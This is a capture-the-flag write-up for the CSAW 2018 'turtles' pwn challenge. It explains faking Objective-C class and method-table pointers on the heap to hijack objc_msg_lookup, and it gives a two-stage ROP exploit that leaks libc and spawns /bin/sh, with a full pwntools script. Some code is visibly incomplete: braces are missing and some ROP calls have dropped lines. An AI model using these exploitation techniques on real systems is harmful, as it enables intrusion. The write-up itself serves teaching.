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[CSAW Qualifiers, 2018]

category: pwn

by yrlf

  • Category: pwn
  • Points: 250
  • Description:

Looks like you found a bunch of turtles but their shells are nowhere to be seen! Think you can make a shell for them?

nc pwn.chal.csaw.io 9003



We get an x86_64 linux binary, and reading the main function immediately show us this is an Objective-C program (objc_get_class and objc_msg_lookup).

For those unfamiliar with Objective-C, it is mostly like C, but there is a mechanism for Object-Oriented-Programming where methods on objects are called using the functions objc_msg_send and objc_msg_lookup (in the ABI, the syntax for it looks like [instance method: parameter]).

A "message" is just a method call. Methods are identified by a "selector", which is just the method name. At runtime these selectors are replaced with a 64-bit value consisting of two relatively low 32-bit integers concatenated together.

The problem with objc_msg_send and selectors is that it is quite hard to find cross-references when analyzing a binary. In this case the classes are quite simple, so this is not a problem.

Reading the program code shows the code must have been something like this:

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <Foundation/NSObject.h>
#include <Foundation/NSString.h>
@interface Turtle: NSObject
- (void) say: (NSString *) phrase;
@implementation Turtle: NSObject
- (void) say: (NSString *) phrase
    NSLog(@"%@\n", phrase);
int main(int argc, char ** argv) {
    char buf[0x810];
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stdin, NULL, _IONBF, 0);
    Turtle * turtle = [[Turtle alloc] init];
    printf("Here is a Turtle: %p\n", turtle);
    read(STDIN_FILENO, buf, sizeof buf);
    memcpy(turtle, buf, 200);
    [turtle say: @"I am a turtle."];
    [turtle release];
    return 0;

The Vulnerability

The programm allocates a Turtle object on the heap, and then prints its address.

Afterwards, it allows us to write 200 arbitrary bytes into the heap location of the Turtle object. As all method calls in Objective-C are dynamic, this allows something similar to a C++ vtable exploit. For this to work we need to know how an Objective-C class is structured.

For this, we just observed which pointers and offsets the objc_msg_lookup function from gnustep-base.so dereferences, and where the function pointer comes from.

The attack will consist of redirecting all pointers in the structure into the heap area we control and know the address of, leading the program into returning an arbitrary function pointer.

objc_msg_lookup Analysis

This function takes two parameters: the instance and the selector.

At offset 0x00 in our instance, a pointer to the class object is stored. At offset 0x40 in the class object, a pointer to a structure containing a multi-layered table of function pointers is stored. Let's call this structure (at offset 0x40) the "implementation table struct".

For indexing into that table, the two 32-bit parts of the runtime selector value are used.

But first, some kind of length check is performed. The low selector value plus the high selector value shifted left by five are added together and compared to the value in the "implementation table struct" at offset 0x28. If the value is bigger than the one in the struct, the lookup function does something else that does not usually happen, we assumed it fails.

The actual table is located at offset 0x00 in the "implementation table struct". It is indexed using first the low selector value, and then the high selector value. The result is a function pointer that is returned.


objc_msg_lookup(instance* inst, uint64* sel):
    uint64 selv = *sel
    class * cls = inst->class # offset 0x00

    imp_tbl_struct * its = cls->its # offset 0x40
    uint32 sel_low = selv & 0xffffffff
    uint32 sel_high = selv >> 32

    if (sel_low + (sel_high << 5)) >= its->length: # offset 0x28
        # ... irrelevant code
        return its->table[sel_low][sel_high] # offset 0x00

The Attack

For our attack payload, we put a pointer to our fabricated class struct further in the payload at offset 0x00, and then left a bit of space for a ROP chain and data.

After that, we added another pointer, which through our crafted class pointer lies exactly at offset 0x40, meaning it is the pointer to the implementation table struct.

We offset the implementation table struct in such a way, that it points directly after the pointer to it, so that in the payload, all the pointers lie next to each other.

Since the observed selector value in the gnustep-base library from libs.zip was 0x0000001500000064, assuming the values are the same on the remote server, we can adjust the first table-level to point just after the previous pointer in the payload, and similar for the second table level.

This leaves us with this payload:

method = 0x4141414141414141
base_vtable = 0x90
base_data = 0x80
payload = (
    p64(turtle + base_vtable + 0x00 - 0x040) + # class
    rop.chain().ljust(base_data - 8, b"\0") +
    data.ljust(base_vtable - base_data, b"\0") +
    p64(turtle + base_vtable + 0x08 - 0x000) + # imp_table_struct
    p64(turtle + base_vtable + 0x10 - 0x64 * 8) + # tbl_level1
    p64(turtle + base_vtable + 0x18 - 0x15 * 8) + # tbl_level2

Getting a shell

Using the payload we constructed above, we can an adjust-gadget that pops a few things off the stack, in order to land inside our stack buffer.

We found a gadget that pops into irrelevant registers 4 times, landing exactly after our crafted class pointer in the stack buffer.

From that point, we have ROP, and can ROP to printf in order to leak a GOT entry and recover the libc base address. After that, we ROP back to main in order to send a second ROP-chain and jump to libc's system

Stage 1 ROP-chain:

data = b"%sEND"
rop.raw(turtle + base_data)

Using that knowledge, we can now calculate the address of system in the libc and get a shell:

Stage 2 ROP-chain:

data = b"/bin/sh"
rop.raw(turtle + base_data)

With that, we can execute cat flag and get the flag:


The Script

This is the python script used to solve the challenge, after being cleaned up a bit:

from pwn import *
context.arch = "amd64"
r = remote("pwn.chal.csaw.io", 9003)
libc = ELF("libs-nopreload/libc.so.6")
r.readuntil(b": ")
turtle = int(r.readline(), 16)
print("turtle address: 0x{:016x}".format(turtle))
main_addr = 0x400B84
class_turtle = 0x6014c0
rop_adjust4 = 0x00400d3c
rop_rdi = 0x00400d43
rop_rsi_r15 = 0x00400d41
method = rop_adjust4
base_vtable = 0x90
base_data = 0x80
rop_chain = b"CCCCCCCC"
printf_plt = 0x4009D0
setvbuf_got = 0x601288
rop = ROP([ELF("./turtles")])
rop.raw(turtle + base_data)
data = b"%sEND"
payload = (
    p64(turtle + base_vtable + 0x00 - 0x040) + # class
    rop.chain().ljust(base_data - 8, b"\0") +
    data.ljust(base_vtable - base_data, b"\0") +
    p64(turtle + base_vtable + 0x08 - 0x000) + # imp_table_struct
    p64(turtle + base_vtable + 0x10 - 0x64 * 8) + # tbl_level1
    p64(turtle + base_vtable + 0x18 - 0x15 * 8) + # tbl_level2
r.send(payload.ljust(200, b'A'))
setvbuf_addr = u64(r.readuntil(b"END")[:-3].ljust(8, b"\0"))
print("setvbuf address: 0x{:016x}".format(setvbuf_addr))
libc.address = setvbuf_addr - libc.symbols[b"setvbuf"]
print("system address: 0x{:016x}".format(libc.symbols[b"system"]))
data = b"/bin/sh"
r.readuntil(b": ")
turtle = int(r.readline(), 16)
print("turtle address: 0x{:016x}".format(turtle))
method = rop_adjust4
rop = ROP([ELF("./turtles")])
rop.raw(turtle + base_data)
payload = (
    p64(turtle + base_vtable + 0x00 - 0x040) + # class
    rop.chain().ljust(base_data - 8, b"\0") +
    data.ljust(base_vtable - base_data, b"\0") +
    p64(turtle + base_vtable + 0x08 - 0x000) + # imp_table_struct
    p64(turtle + base_vtable + 0x10 - 0x64 * 8) + # tbl_level1
    p64(turtle + base_vtable + 0x18 - 0x15 * 8) + # tbl_level2
r.send(payload.ljust(200, b'A'))
r.sendline(b"cat flag")
/writeups/ $
